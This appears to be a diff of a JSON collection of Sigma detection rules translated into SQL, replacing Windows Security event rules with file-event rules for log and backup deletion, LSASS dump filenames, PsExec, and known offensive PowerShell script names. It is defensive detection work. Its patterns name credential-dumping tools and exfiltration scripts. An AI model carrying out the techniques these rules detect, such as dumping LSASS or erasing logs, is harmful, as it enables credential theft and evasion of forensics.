"level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", 
"status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "Exchange PowerShell Cmdlet 
History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Possible FP during log rotation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. 
It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
(TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "status": "experimental", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential Persistence Via Outlook Form", + 
"id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' 
ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' 
OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "status": "test", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects potential 
mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.001" 
@@ -714,3912 +735,3454 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "title": "PsExec Service File Creation", + "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out 
the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_tool_psexec.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE 
'%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE 